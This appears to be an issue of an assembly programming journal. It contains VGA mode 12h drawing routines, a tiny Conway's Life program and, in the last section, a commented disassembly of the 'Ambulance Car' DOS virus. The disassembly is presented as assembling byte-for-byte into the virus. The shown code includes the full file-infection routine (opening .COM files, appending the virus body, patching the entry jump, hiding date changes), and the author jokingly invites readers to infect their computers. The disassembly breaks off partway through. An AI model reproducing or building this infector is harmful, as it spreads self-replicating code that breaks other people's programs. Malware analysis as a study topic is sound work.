L-val = (26 - 2) AND 7 = 24 AND 7 = 0 L-mask = 00000000
K-val = (26 - 2 - 0)/8 = 3
So, if the line ends on a byte boundary, we may NOT try to plot <A LOT> of
pixels past it (in a plotting loop that starts with CX = 0).
What the H_line procedure does is no more than what I described above. Here
comes the source:
-------- H_Line -------------------------------- Start -----------
L0: mov cx, [di.DeltaX] ; do a short line
L1: call PlotPix ; by just repeating a single pixel-
inc [di.CurrX] ; plot and update of CurrX
loop L1 ; until done
pop es, cx, bx, ax
ret
H_Line: push ax, bx, cx, es ; optimized horizontal line drawing
cmp [di.DeltaX], 17 ; too few pixels for a bulk draw?
jb L0
mov cx, [di.CurrX] ; do a long line
add cx, [di.Win_X] ; first get the E-value as described
and cx, 0111xB ; above
mov bx, 8
sub bx, cx
mov [E_val], bx ; pixels to plot in leftmost byte
mov al, 0FF ; now compose the mask to use there
shr al, cl
mov [E_mask], al ; and store it in memory
mov cx, [di.DeltaX] ; CX = length of line
sub cx, [E_val] ; compensate for first-byte pixels
mov ax, cx
and ax, 0111xB ; this many pixels in rightmost byte
mov [L_val], ax ; and store it in memory
sub cx, ax ; CX = number of pixels in between
shr cx, 3 ; divide by 8 pixels per byte
mov [K_val], cx ; number of "full" bytes to plot
clr al ; AL := 0
mov cx, [L_val] ; prepare to compose L-mask
cmp cx, 0 ; any bits in "last byte"
IF ne mov al, bit 7 ; if any bits, set up AL register
dec cx ; compensate for pixel 0, ...
sar al, cl ; ... compose plotting mask and ...
mov [L_mask], al ; ... store it into memory.
; that's it. Let's plot!
call VGaddr ; load BX with address of byte in
; VGA memory
mov ah, [E_mask]
call SetMask ; set plotting mask and ...
call VgaPlot ; ... plot leftmost part
inc bx ; get adjacent address
mov cx, [K_val] ; prepare for bulk-filling
jcxz >L4 ; if nothing to do, jump out
mov ah, 0FF ; else set ALL PIXELS mask
call SetMask
L3: call VgaPlot ; plot middle part
inc bx
loop L3 ; until done
L4: mov ah, [L_mask]
call SetMask
call VgaPlot ; plot remaining pixels
mov ax, [di.DeltaX]
add [di.CurrX], ax ; make sure CurrX is updated
pop es, cx, bx, ax ; and git outa'here
ret
-------- H_Line --------------------------------- End ------------
The preparations are the bulk of the work, but after that is done, the line is
plotted with the lowest amount of I/O overhead.
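The preparation step can be tried out on paper, or with the Python sketch
below. It is an illustration with made-up names, not the original routine: it
computes the E, K and L values and masks the way H_Line does, building the
L-mask as 080 SAR (L-val - 1), and assumes a line long enough to reach past
the first byte.

```python
def sar8(value, count):
    """Arithmetic shift right of an 8 bit value, like SAR on AL."""
    signed = value - 256 if value & 0x80 else value
    return (signed >> count) & 0xFF

def hline_params(screen_x, total):
    """Return (E-val, E-mask, K-val, L-val, L-mask) for a line of total pixels.

    screen_x is CurrX + Win_X; total must be at least E-val.
    """
    start_bit = screen_x & 7
    e_val = 8 - start_bit                   # pixels in the leftmost byte
    e_mask = 0xFF >> start_bit              # mask for the leftmost byte
    l_val = (total - e_val) & 7             # pixels in the rightmost byte
    k_val = (total - e_val - l_val) // 8    # full bytes in between
    l_mask = sar8(0x80, l_val - 1) if l_val else 0x00
    return e_val, e_mask, k_val, l_val, l_mask
```

For the 26 pixel line starting at pixel 6 this gives E-val 2, E-mask 00000011,
K-val 3, L-val 0 and an empty L-mask, as in the example above. A 29 pixel line
from the same position ends with L-val 3 and L-mask 11100000.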
Vertical lines.
---------------
Vertical lines are simply plotted by repeatedly calling PlotPix. It's so simple
that I neither need nor want to elaborate on it:
-------- VertLin ------------------------------- Start -----------
VertLin: push cx ; draw a vertical line
mov cx, [di.DeltaY]
L0: call PlotPix
inc [di.CurrY] ; adjust Y coordinate
loop L0 ; but not X value!
pop cx
ret
-------- VertLin -------------------------------- End ------------
What to do with linedrawing functions?
--------------------------------------
Now that we can draw lines, we can also draw boxes and window borders. This
all looks very professional and the overview of a program is enhanced
considerably. Try to figure out how to make the box-drawers by yourself.
Plotting text.
--------------
Now that we have windows that can be put at any plotting position, we also
need to be able to position text at any position. It doesn't look nice if
different windows force text to default to byte boundaries. And with the
experience we got from the H_line function, we are able to make a character
plotter that puts text on screen at ANY position.
I use a 9 x 16 character set. The ninth bit is just always blank, but it
enhances readability considerably. The characters in the bitmap are all 8
pixels wide and 16 pixels tall.
In exceptional cases, the bitmaps can be plotted at byte boundaries. In 85+ %
of the cases this will not be so. Therefore I do the following:
- do some positioning math first
- repeat 16 times:
    - load the byte of the bitmap in AH
    - shift AX to the right the correct number of pixels
    - plot the AH part
- if plotting on a byte boundary, we're done, else
- repeat 16 times:
    - load the byte of the bitmap in AH
    - shift AX to the right the correct number of pixels
    - plot the AL part
Let's just have a look:
-------- PutChar ------------------------------- Start -----------
L0: add [di.CurrY], 16 ; process 'LF'
L1: pop es, si, cx, bx
ret
L2: mov bx, [di.Indent] ; process 'CR'
mov [di.CurrX], bx
jmp L1
PutChar: push bx, cx, si, es ; print char in al at (x,y)
cmp al, lf
je L0
cmp al, cr
je L2
mov bx, [di.CurrX]
add bx, CHR_WID
cmp bx, [di.Win_wid] ; still safe to print character?
jbe >L3 ; if so, skip over this part
mov bx, [di.Indent]
mov [di.CurrX], bx ; mimick 'CR'
add [di.CurrY], 16 ; mimick 'LF'
L3: mov cx, [di.CurrX]
add cx, [di.Win_X]
and cx, 0111xB
mov [C_val], cl ; store shiftcount for masks
mov bx, 0FF00
shr bx, cl ; setup plotting mask and ...
mov [P_mask], bx ; ... store it
clr ah ; ax = ASCII code
mov si, ax ; make address of pixels in bitmap
shl si, 4
add si, offset bitmap
call VGaddr ; bx = -> in video memory
mov ax, [P_mask] ; only the AH part is used ...
call SetMask ; ... here.
mov cx, 16 ; 16 pixel lines per token
L4: push cx ; we're in the loop now
mov ah, [si] ; AH = pixelpattern
clr al ; AL = empty
mov cl, [C_val] ; get shiftcount
shr ax, cl ; distribute pixelBYTE across a WORD
mov cl, [es:bx] ; dummy read, CL is expendable
mov [es:bx], ah ; actual plotting of this half
add bx, 80 ; point to next pixelbyte address
inc si ; next pixeldata address
pop cx
loop L4 ; and loop back
sub bx, 16 * 80 - 1 ; back to the top row, one byte to the right
mov ax, [P_mask]
cmp al, 0 ; if nothing to do, ...
je >L6 ; ... skip this chapter
mov ah, al ; else repeat the lot for the right-
call SetMask ; most pixels....
mov cx, 16
sub si, cx ; correct SI
L5: push cx
mov ah, [si]
clr al
mov cl, [C_val]
shr ax, cl
mov cl, [es:bx]
mov [es:bx], al
add bx, 80
inc si
pop cx
loop L5
L6: add [di.CurrX], CHR_WID ; adjust CurrX value before ...
jmp L1 ; ... getting a hike
-------- PutChar -------------------------------- End ------------
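To see what the shift and the two masks do, here is a small Python model of
one bitmap row going through the L4 and L5 loops. It is only a sketch: the
name split_glyph_row is made up for this illustration, and it leaves out the
VGA latches and the SetMask call, modelling just the arithmetic on AX and
P_mask.

```python
def split_glyph_row(pattern, x):
    """Model one bitmap row of PutChar.

    pattern: 8-bit glyph row (what the listing loads into AH)
    x:       absolute pixel column of the character's left edge
    Returns (shift, left_byte, right_byte, left_mask, right_mask).
    """
    shift = x & 0b111                    # and cx, 0111xB
    word = (pattern << 8) >> shift       # AH = pattern, AL = 0, shr ax, cl
    mask = (0xFF00 >> shift) & 0xFFFF    # mov bx, 0FF00 / shr bx, cl
    left_byte, right_byte = word >> 8, word & 0xFF    # plotted from AH, AL
    left_mask, right_mask = mask >> 8, mask & 0xFF    # the two halves of P_mask
    return shift, left_byte, right_byte, left_mask, right_mask


if __name__ == "__main__":
    for x in (0, 3, 8):
        print(x, [format(v, "08b") for v in split_glyph_row(0b10000001, x)[1:]])
```

For x = 3 the row 10000001b lands as 00010000b in the left byte and 00100000b
in the right one. When x is a multiple of 8 the right-hand mask is zero, which
is the case the listing tests with 'cmp al, 0' to skip the second loop.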
So much for plotting text. This routine will draw any character at any place on
the graphics screen. But it needs a CurrX and a CurrY value to know where to
plot things. This is both an advantage and a disadvantage. The advantage is
that we can plot ANYWHERE we like. The disadvantage is that we need to
specify CurrX and CurrY explicitly before the text ends up where we would like
to have it.
That's why I made the construct with the Topic and TopicEnd macros, as
described above.
Here comes the code for printing a table on screen. We spent a lot of time on
the preparations, and this is the stage where it is going to pay off. Look how
much code we need for printing neat sets of tokens and characters on screen.
-------- Print --------------------------------- Start -----------
print: mov ah, [di.TxtCol] ; print a table of text
call SetColr
L0: lodsw ; get Xpos
cmp ax, 0F000 ; end of table?
je ret ; exit, if so
mov [di.CurrX], ax
lodsw ; get Ypos
mov [di.CurrY], ax
L1: lodsb ; get text
cmp al, 0
je L0
call putchar ; and print it
jmp L1 ; until this line is done
-------- Print ---------------------------------- End ------------
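The table format that Print walks through can be read off the listing: a word
for X, a word for Y, a zero-terminated string, and finally a word 0F000h where
the next X would be. The Python sketch below walks such a table. The name
walk_table and the sample data are invented for this illustration, and it
assumes that TopicEnd is what emits the 0F000h word.

```python
import struct

END_OF_TABLE = 0xF000   # sentinel word tested by "cmp ax, 0F000"


def walk_table(table):
    """Yield (x, y, text) for every entry of a Print-style table."""
    pos = 0
    while True:
        (x,) = struct.unpack_from("<H", table, pos)   # lodsw: get Xpos
        pos += 2
        if x == END_OF_TABLE:                         # end of table?
            return
        (y,) = struct.unpack_from("<H", table, pos)   # lodsw: get Ypos
        pos += 2
        end = table.index(b"\0", pos)                 # lodsb until a zero byte
        yield x, y, table[pos:end].decode("ascii")
        pos = end + 1


if __name__ == "__main__":
    sample = (struct.pack("<HH", 16, 32) + b"Hello\0" +
              struct.pack("<HH", 16, 48) + b"World\0" +
              struct.pack("<H", END_OF_TABLE))
    for entry in walk_table(sample):
        print(entry)
```

Moving a line of text on screen then means changing two words in the table,
which is the point the article makes about quick layout changes.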
With this approach, and starting from a working (empty) framework of routines,
you can design the user interface of your software within the hour. And it will
look just fine.
The actual code is then the only thing you need to worry about.....
Having such routines, which have been tested and found reliable, you can build
the user interface easily and spend most of your time on the actual coding. If
the screen needs another layout (since you couldn't realize the function you
considered), just change a few entries in the table.
Many times just the X or Y values need some adjustment for better lining up,
or for regrouping. No need to worry about the order of the plotting. Just make
sure that the correct window is selected (for the colours) and that the table
is terminated by a TopicEnd.
Conclusion.
-----------
That concludes my elaboration on VGA mode 12h. Again, I would rather use 800 x 600
but that mode is not standardised. VGA 12h is standard on all VGA cards, so
it's the best we can universally get and for many applications it is more than
enough.
Please try to make the BoxDrawing function. I will submit the "solution" to
the next issue. For future issues I will start working on an explanation about
mouse-usage. This little rodent is nice to control many applications. If the
screen is well laid out, you don't need the keyboard for data entry. Just drag
the mouse along the screen and poke him in the eye.
The bitmap data for the character generator can be obtained from
http://asmjournal.freeservers.com/supplements/univ-vmode.html
where the complete text of the article has been archived.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Conway's Game of Life
by Laura Fairhead
I had the idea for this one day after stumbling upon a "gem" that
somebody had written to play life. It was small and fast and reminded
me of years ago when I had written many versions of this for the
BBC Master 128 (my love lost). Since I had never written a version
for the PC I thought that I would, and ended up spending some hours
trimming off the bytes until it is now :- 156 bytes long. I must admit
if it was not for the program that I found, this program would have been
MUCH slower than it is. After I had written the code I tested it against
the program that I had found and to my perplexity it was a great deal
slower. After some hours of frustration I found the reason:- my program
was accessing the video memory to do the bulk of its work. This must have
brought about a factor of 12 decrease in speed!!
Life is a classic game of cellular automata by John Conway. It is
played on an nxn grid of squares. Each square may be occupied by a
cell or empty. Each 'go' of the game the player calculates the next
generation of a colony of cells by applying three simple rules:-
(i) a cell with fewer than 2 or more than 3 neighbours dies
(ii) a cell with 2 or 3 neighbours survives
(iii) a cell is born in a square with exactly 3 neighbours
A neighbouring square is one diagonally adjacent as well as the
normal horizontal/vertical so each square has 8 neighbouring squares.
Overview of the code
~~~~~~~~~~~~~~~~~~~~
First, note that if we define
    S := state of square in this generation (0=empty, 1=occupied)
    N := number of neighbours
    S':= state of square in the next generation
then according to the rules
    S' = { 0, if N<2 or N>3
         { 1, if (N=2 or N=3) and S=1
         { 1, if N=3
so S'=1 iff (N=2 and S=1) or N=3
this can be simplified using bitwise-OR to the dramatically simple:
    S' = ( (N|S) = 3 )
This works because N|S can only equal 3 when N=3 (S then makes no
difference) or when N=2 and S=1; N<2 gives at most 1, and any N>3 has bit2
or bit3 set.
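The equivalence is small enough to check exhaustively. The Python sketch
below compares the three rules, written out literally, with the bitwise-OR
shortcut for every N from 0 to 8 and both values of S. The function names are
made up for this check.

```python
def next_state_rules(n, s):
    """The three rules of Life, written out literally."""
    if n < 2 or n > 3:
        return 0                  # rule (i): the cell dies, or no cell is born
    if s == 1:
        return 1                  # rule (ii): n is 2 or 3 here, the cell survives
    return 1 if n == 3 else 0     # rule (iii): birth needs exactly 3 neighbours


def next_state_or(n, s):
    """The shortcut: S' = ((N | S) == 3)."""
    return 1 if (n | s) == 3 else 0


mismatches = [(n, s) for n in range(9) for s in (0, 1)
              if next_state_rules(n, s) != next_state_or(n, s)]

if __name__ == "__main__":
    print("mismatches:", mismatches)
```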
note: iff means "if and only if"
"A iff B" means that A => B and B => A
The code uses one big array with one byte for each square that
starts just after the program end. To save space it just assumes that it
can use this memory since this is generally okay. However this is
very bad practice really and it should use AH=04Ah/int 021h to adjust
the memory size and abort if not successful.
The big array actually serves the purpose of 2 arrays; bit0 of
a byte indicates the state of the square in the current generation. bit4
of each byte indicates the state of the square in the next generation.
After initialisation, generation 0 is calculated by filling about
1/4 of the array with 1's.
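The 1/4 comes from the three instructions CMP AL,0C0h / SBB AL,AL / INC AX in
the listing further on. Here is a Python model of that sequence; seed_cell is
a made-up name, and the 1/4 figure assumes that the pseudo-random byte in AL
is spread evenly over 0..255.

```python
def seed_cell(al):
    """Model CMP AL,0C0h / SBB AL,AL / INC AX for one random byte in AL."""
    carry = 1 if al < 0xC0 else 0   # CMP sets CF when AL is below 0C0h
    al = (-carry) & 0xFF            # SBB AL,AL gives 0FFh if CF, else 00h
    al = (al + 1) & 0xFF            # INC AX; only AL is stored by STOSB
    return al


alive = sum(seed_cell(v) for v in range(256))

if __name__ == "__main__":
    print(alive, "of 256 byte values produce a live cell")
```

Only the 64 values 0C0h..0FFh produce a 1, which is a quarter of the range.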
Now we do a loop to get the next generation. The screen is 0140h
bytes across and 0C8h bytes down. Therefore the eight neighbours of a cell
lie at these offsets from it:-
    -0141h  -0140h  -013Fh
    -0001h     .    +0001h
    +013Fh  +0140h  +0141h
If DI is the offset of the array which we are calculating for,
note that the neighbours can be summed as follows:-
MOV AX,[DI-0141h]
ADD AL,[DI-013Fh]
ADD AX,[DI+013Fh]
ADD AL,[DI+0141h]
ADD AL,[DI-1]
ADD AL,[DI+1]
ADD AL,AH
Note that if bit4 of any of the neighbours was set then we would
still have the correct total in the least significant 4 bits of AL.
So from here the new cell state can be calculated simply:-
OR AL,[DI]
AND AL,0Fh
CMP AL,3
And if ZF=1 now we have a set cell.
JNZ ko
OR BYTE PTR [DI],010h
ko:
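Why the low nibble stays correct can be checked with a short Python model.
Each neighbour byte is one of 00h, 01h, 10h or 11h, so eight of them add up
to at most 88h: the bit0 count never spills into bit4, and nothing overflows
the byte. The function names are invented for this sketch.

```python
def neighbour_count(cells):
    """cells: the 8 neighbour bytes, each 00h, 01h, 10h or 11h."""
    total = sum(cells) & 0xFF       # the chain of byte additions ending in AL
    return total & 0x0F             # the live count sits in the low 4 bits


def next_bit(cells, centre):
    """Model OR AL,[DI] / AND AL,0Fh / CMP AL,3 for one cell."""
    al = (sum(cells) & 0xFF) | centre
    return 1 if (al & 0x0F) == 3 else 0


if __name__ == "__main__":
    mixed = [0x10, 0x01, 0x11, 0x00, 0x00, 0x00, 0x10, 0x01]
    print(neighbour_count(mixed), next_bit(mixed, 0x00))
```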
When the next generation has been calculated we have done most of
the work. The only thing is that if we want to iterate we need all
of those bit4 's moved to bit0, also we want to display the next
generation, this can be done easily at the same time.
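The listing does this fix-up four cells at a time with SHR EAX,4 and
AND EAX,01010101h. A Python model of that step follows; fixup is a made-up
name and the sketch assumes the buffer length is a multiple of four.

```python
def fixup(cells):
    """Move bit4 of every byte to bit0 and clear all other bits."""
    out = bytearray()
    for i in range(0, len(cells), 4):
        eax = int.from_bytes(cells[i:i + 4], "little")   # LODSD
        eax = (eax >> 4) & 0x01010101                    # SHR EAX,4 / AND EAX,01010101h
        out += eax.to_bytes(4, "little")                 # stored to array and screen
    return bytes(out)


if __name__ == "__main__":
    print(fixup(bytes([0x00, 0x01, 0x10, 0x11])).hex())
```

The shift drags the low nibble of each byte into the byte below it, but the
mask throws those bits away again, so only the old bit4 survives as the new
bit0.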
Note that due to the structure of the code generation#0 is never
displayed. Also we always have blue cells. Despite this it is quite
an entertaining little program to watch....
The source here is in MASM format but should be trivial to convert
to run on any assembler. It is assembled into a .COM file which means
you should use the /T option on the linker (T=tiny).
===========START OF CODE===================================================
OPTION SEGMENT:USE16
.386
cseg SEGMENT BYTE
ASSUME NOTHING
ORG 0100h
kode PROC NEAR
;
;mode 013h=320x200x256 (0140hx0C8h) and be kind with the stack
;
MOV SP,0100h
MOV AX,013h
INT 010h
;
;use current time as random number seed
;in BP,DX which is used later
;
MOV AH,02Ch
INT 021h
MOV BP,CX
;
;get seg address of 1st seg after code for array store start
;for now ES points there and DS=screen
;
MOV AX,DS
ADD AX,01Ah ;(OFFSET endofprog+0Fh>>4)=(1A)
MOV ES,AX
MOV AX,0A000h
MOV DS,AX
;
;CREATE GENERATION#0
; this is done by filling approx 1/4 of the cells in the array
; 'randomly', while taking care not to fill any edge cells
;
;
;blank the array
; this is done to ensure the edge cells are clear
;
XOR DI,DI
MOV CX,0FA00h
REP STOSB
;
;fill the array
; two nested loops, CL counts the rows, SI counts the columns
; this is so that after each row DI can be bumped past the edge
;
MOV CL,0C6h
MOV DI,0141h ;array offset we are addressing
;
;BX is 0141h from now until exit, it is used as a constant later
;
MOV BX,DI
lopr0: MOV SI,-013Eh
;
;iterate random number seed in BP,DX
;
lopr: LEA AX,[BP+DI]
ROR BP,3
XOR BP,DX
SUB DX,AX
;
;set cell with probability 1/4
;
CMP AL,0C0h
SBB AL,AL
INC AX
STOSB
;
;
INC SI
JNZ lopr
SCASW ;DI+=2, skipping edge
LOOP lopr0
;
;now we set DS=array, ES=screen. this doesn't change until exit
;
PUSH ES
PUSH DS
POP ES
POP DS ;DS=vseg,ES=0A000h throughout
;
;'mlop' is the main loop, outputting generations until the user terminates
;
mlop:
;
;CREATE NEXT GENERATION
;
MOV DI,BX ;DI=0141h
;
;'lopy' is the loop for rows, a count is not needed because we can get
;the stop point from testing the array offset DI
;
lopy: MOV SI,013Eh
;
;'lopx' is the loop for columns, SI holds the count
;
;
;get the total number of neighbours into the least significant 4 bits of AL
;
lopx: MOV AX,[DI-0141h]
ADD AL,[DI-013Fh]
ADD AX,[DI+BX-2]
ADD AL,[DI+BX]
ADD AL,[DI-1]
ADD AL,[DI+1]
ADD AL,AH
;
;calculate new cell state
;
OR AL,[DI]
AND AL,0Fh
CMP AL,3
JNZ SHORT ko
OR BYTE PTR [DI],010h
ko: INC DI
DEC SI
JNZ lopx
;
;(each row we miss 2 edge cells)
;
SCASW
CMP DI,0FA00h-013Fh
JC lopy
;
;FIXUP ARRAY AND DISPLAY
; bit4 is copied to bit0 in each byte. all other bits then cleared so
; cells appear as blue pixels, also the iteration loop above assumes
; that bit4 is clear on entry (it only sets it)
;
MOV CX,03E80h
XOR DI,DI
lopc: LODSD
SHR EAX,4
AND EAX,01010101h
MOV [SI-4],EAX
STOSD
LOOP lopc
;
;USER KEYPRESS?
;
MOV AH,0Bh
INT 021h
ADD AL,3
;
;no, back for next generation
;
JP mlop
;
;yes, AL=2 now so make AX=2 to go into text mode
;
CBW
INT 010h
;
;back to DOS
;
MOV AH,04Ch
INT 021h
kode ENDP
endofprog EQU $
cseg ENDS
END FAR PTR kode
===========END OF CODE=====================================================
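The keypress test at the end of the listing relies on the parity flag. DOS
function 0Bh returns AL=00h when no key is waiting and AL=0FFh when one is.
After ADD AL,3 these become 03h (two bits set, even parity, so JP is taken)
and 02h (one bit set, odd parity, so the code falls through with the text
mode number already in AL). A Python model, with invented function names:

```python
def parity_even(value):
    """PF as the CPU sets it: 1 when the low byte has an even number of 1 bits."""
    return bin(value & 0xFF).count("1") % 2 == 0


def keep_running(al):
    """Model ADD AL,3 / JP mlop on the value returned by INT 21h, AH=0Bh."""
    al = (al + 3) & 0xFF
    return parity_even(al)


if __name__ == "__main__":
    print(keep_running(0x00), keep_running(0xFF))
```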
While the code is optimised for size and for speed you may find that
it runs too quickly. This can be easily remedied by the addition of a
wait-for-vertical-synchronisation loop (or vert sync as we techies call it).
Just add the following after the generation calculating code (that
is after the instruction 'JC lopy'):-
MOV DX,03DAh
lopv0: IN AL,DX
AND AL,8
JNZ lopv0
lopv1: IN AL,DX
AND AL,8
JZ lopv1
Note that adding this changes the program size. 'endofprog' is now
01ABh, so the number of paragraphs to add to DS to get the start of free space
is now 01Bh. You must change the instruction at the beginning of the code:-
MOV AX,DS
** ADD AX,01Bh ;(OFFSET endofprog+0Fh>>4)=(1B) **
MOV ES,AX
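The constant is simply the end offset of the program rounded up to the next
16-byte paragraph. The Python lines below redo that arithmetic;
paragraphs_to_skip is a made-up name, and the two end offsets are the ones
the article gives (0100h plus 156 bytes for the original, 01ABh for the
version with the vert sync loop).

```python
def paragraphs_to_skip(end_offset):
    """(OFFSET endofprog + 0Fh) >> 4: round up to whole 16-byte paragraphs."""
    return (end_offset + 0x0F) >> 4


if __name__ == "__main__":
    print(hex(paragraphs_to_skip(0x0100 + 156)))   # original program
    print(hex(paragraphs_to_skip(0x01AB)))         # with the vert sync loop
```

If you change the code in any other way, recompute the value the same way
rather than guessing it.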
One final note: I use SCASW in this code to increment DI by two.
This is a well known space saving trick. However you must be wary since
it does not do just that; it reads the memory at ES:[DI]. Generally this
is fine but if DI=0FFFFh we will get a general protection fault.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
'Ambulance Car' Disassembly
by Chili
This virus definitely has my favourite payload of all time. I just love
seeing that little ambulance run across the screen with a 'siren' playing at
the same time. Other than that, the virus itself isn't much of a thing. Don't
forget though, that it dates back to at least 1990.
It is a non-resident .COM infector, and each time an infected file is run it
will attempt to infect two files (be it in the current directory or in a
directory located in the PATH) in a parasitic manner. Infected files will
grow by 796 bytes, the main virus body being appended to the end of the host.
The host file's date and time are preserved. On occasion the virus will
display the 'ambulance car' payload.
The virus doesn't preserve the initial contents of AX and so programs like
HotDIR fail to run when infected. Also if there is any reference to 'PATH' in
the environment block before the actual PATH string the virus will assume that
to be the actual PATH (e.g. 'CLASSPATH=...').
Playing it safe
---------------
At the DOS prompt type "PATH ;" so that the virus will only infect files in the
current directory and you can keep track of things. Also if all you want to do
is see the payload, then comment the following lines in the source code (right
after the delta offset calculation) so that no files are infected:
call search_n_infect
call search_n_infect
Moreover you should comment the lines presented below (for the 'RedXAny' strain
look-alike) so that the payload is shown every time the virus is run.
In case things start to get out of hand, you should do one of three things:
disinfect the files yourself with a hex editor, use the latest version
of F-PROT (available from ftp.complex.is or through Simtel and Garbo) to scan
and clean the infected files, or use my own disinfector (in another article) to
clean this specific strain.
[NOTE: F-PROT will report the strain whose source code is presented as
Ambulance.796.D]
Keep in mind that this virus is not destructive, so feel free to go ahead and
infect your entire computer (you really shouldn't do this, since accidents can
sometimes happen!).
Strains
-------
A 'RedXAny' strain look-alike can be obtained by commenting the following
lines (both in the 'payload' procedure):
jne exit_payload ; (starting with the sixth)
jnz exit_payload ; don't show payload
[NOTE: This will not give you the actual 'RedXAny' strain, but one that behaves
in the same manner - always shows the ambulance car]
Other strains exist, but will not be discussed here, as nothing of interest
would be added.
Compatibility
-------------
The virus runs ok in a Win95 DOS box. Also, remember that for the payload to
be appreciated in full, a PC Speaker is required. Bad luck for those of you who
don't have a computer with one...
Here is the disassembly:
--8<---------------------------------------------------------------------------
; Ambulance Car (aka Ambulance, RedX, Red Cross)
; Ambulance-B strain (or so it seems!)
; Disassembly by Chili for APJ #6
; Byte for byte match when assembled with TASM 4.1
; Assemble with:
; tasm /ml /m2 ambul-b.asm
; tlink /t ambul-b.obj
PSP_environment_seg equ 2Ch ; PSP location of process' environment
; block segment address
BDA_addr equ 40h ; BDA (Bios Data Area) segment address
BDA_LPT3_port_addr equ 0Ch ; BDA location of LPT3 I/O port base
; address
BDA_video_mode equ 49h ; BDA location of current video mode
BDA_timer_counter equ 6Ch ; BDA location of number of timer ticks
; (18.2 per second) since midnight
_TEXT segment word public 'code'
assume cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT
org 100h
; Host and virus' main body
;--------------------------
ambulance_car proc far
; Jump over host to real beginning of virus
db 0E9h, 01h, 00h ; Hardcoded relative near jump
; Host (missing the first 3 bytes)
;
; Dummy host is just 4 bytes so only a 'nop' here
host:
nop
; Calculate the delta offset
;
; This piece of code will 'fool' some disassemblers and so it will appear as:
;
; call $+4
; add [bp-7Fh], bx
; out dx, al
; add ax, [bx+di]
;
; Pretty basic, but could turn out to be somewhat annoying if used all over the
; place (for the person doing the disassembly, that is!)
;
; (because of 'db 01h'; used since the near jump above is also 3 bytes long
; and that has to be taken into account for the displacement calculation)
real_start:
call find_displacement
db 01h ; Used to make this add up to 3 bytes
find_displacement:
pop si
sub si, offset host
; Infect twice then load up the payload
call search_n_infect
call search_n_infect
call payload
; Restore host's original first 3 bytes
lea bx, [si+original_3bytes-4]
mov di, offset ambulance_car
mov al, [bx]
mov [di], al ; Restore 1st byte
mov ax, [bx+1]
mov [di+1], ax ; Restore 2nd and 3rd bytes
; Return control to host
jmp di
; Move on to next step (be it 'search_n_infect' or 'payload')
next_step:
retn
ambulance_car endp
; Search for a file and infect it
;--------------------------------
search_n_infect proc near
; Search for the file
call search
; Found any file?
mov al, byte ptr [si+file_mask-4]
or al, al ; If not, then move on to the
jz next_step ; next step
; Increase 'opened files' counter
lea bx, [si+counter-4]
inc word ptr [bx]
; Open file in read/write mode (AL - 02h)
lea dx, [si+filename-4] ; Open a File
mov ax, 3D02h ; [on entry AL - Open mode;
int 21h ; DS:DX - Pointer to filename
; (ASCIIZ string)]
; [returns AX - File handle]
; Save file handle
mov word ptr [si+file_handle-4], ax
; Read file's first 3 bytes
mov bx, word ptr [si+file_handle-4]
mov cx, 3 ; Read from File or Device,
lea dx, [si+first_3bytes-4] ; Using a Handle
mov ah, 3Fh ; [on entry BX - File handle;
int 21h ; CX - Number of bytes to
; read; DS:DX - Address of
; buffer]
; Check if already infected
mov al, byte ptr [si+first_3bytes-4]
cmp al, 0E9h ; Is first byte a near jump?
jne infect ; If not, assume virus isn't
; here, so go ahead and infect
; Move file pointer to real virus start (pointed to by the initial near jump)
mov dx, word ptr [si+first_3bytes+1-4]
mov bx, word ptr [si+file_handle-4]
add dx, 3 ; Add 3 bytes to account for
; the near jump
xor cx, cx ; Move File Pointer (LSEEK)
mov ax, 4200h ; [on entry BX - File handle;
int 21h ; CX:DX - Offset, in bytes;
; AL - Mode code ( Move
; pointer CX:DX bytes from
; beginning of file, AL - 0)]
; Read first 6 bytes from that location
mov bx, word ptr [si+file_handle-4]
mov cx, 6
lea dx, [si+six_bytes-4]
mov ah, 3Fh ; Read from File or Device,
int 21h ; Using a Handle
; Double-check if already infected
;
; Compares the bytes read with the first part of the displacement calculation
; code
mov ax, word ptr [si+six_bytes-4]
mov bx, word ptr [si+six_bytes+2-4]
mov cx, word ptr [si+six_bytes+4-4]
cmp ax, word ptr [si+ambulance_car]
jne infect
cmp bx, word ptr [si+ambulance_car+2]
jne infect
cmp cx, word ptr [si+ambulance_car+4]
je close_file ; If already infected, then go
; ahead and close the file
infect:
; Reset file pointer to end of file (AL - 2)
mov bx, word ptr [si+file_handle-4]
xor cx, cx
xor dx, dx ; Move File Pointer (LSEEK)
mov ax, 4202h ; [returns DX:AX - New pointer
int 21h ; location]
; Calculate virus' near jump relative offset
sub ax, 3 ; Account for the near jump
mov word ptr [si+relative_offset-4], ax
; Get and save file's date and time (AL - 0)
mov bx, word ptr [si+file_handle-4]
mov ax, 5700h ; Get a File's Date and Time
int 21h ; [on entry BX - File handle]
push cx ; [returns CX - Time; DX -
push dx ; Date]
; Write virus body to end of file
mov bx, word ptr [si+file_handle-4]
mov cx, virus_body - real_start
lea dx, [si+ambulance_car] ; Write to a File or Device,
mov ah, 40h ; Using a Handle
int 21h ; [on entry BX - File handle;
; CX - Number of bytes to
; write; DS:DX - Address of
; buffer]
; Write host's first 3 bytes to after virus body
mov bx, word ptr [si+file_handle-4]
mov cx, 3
lea dx, [si+first_3bytes-4]
mov ah, 40h ; Write to a File or Device,
int 21h ; Using a Handle
; Move file pointer to beginning of file
mov bx, word ptr [si+file_handle-4]
xor cx, cx
xor dx, dx
mov ax, 4200h ; Move File Pointer (LSEEK)
int 21h
; Write jump-to-virus-body code to beginning of file
mov bx, word ptr [si+file_handle-4]
mov cx, 3
lea dx, [si+jump_code-4]
mov ah, 40h ; Write to a File or Device,
int 21h ; Using a Handle
; Reset file's date and time to previous (AL - 1)
pop dx
pop cx
mov bx, word ptr [si+file_handle-4]
mov ax, 5701h ; Set a File's Date and Time
int 21h ; [on entry BX - File handle;
; CX - Time; DX - Date]
close_file:
mov bx, word ptr [si+file_handle-4]
mov ah, 3Eh ; Close a File Handle
int 21h ; [on entry BX - File handle]
retn
search_n_infect endp
; Find a file to infect, in the PATH or in the current directory
;---------------------------------------------------------------
search proc near
mov ax, ds:PSP_environment_seg
mov es, ax
push ds
mov ax, BDA_addr
mov ds, ax
mov bp, ds:BDA_timer_counter
pop ds
; Where to infect
;
; Probability of infecting in the current directory (none of the first two
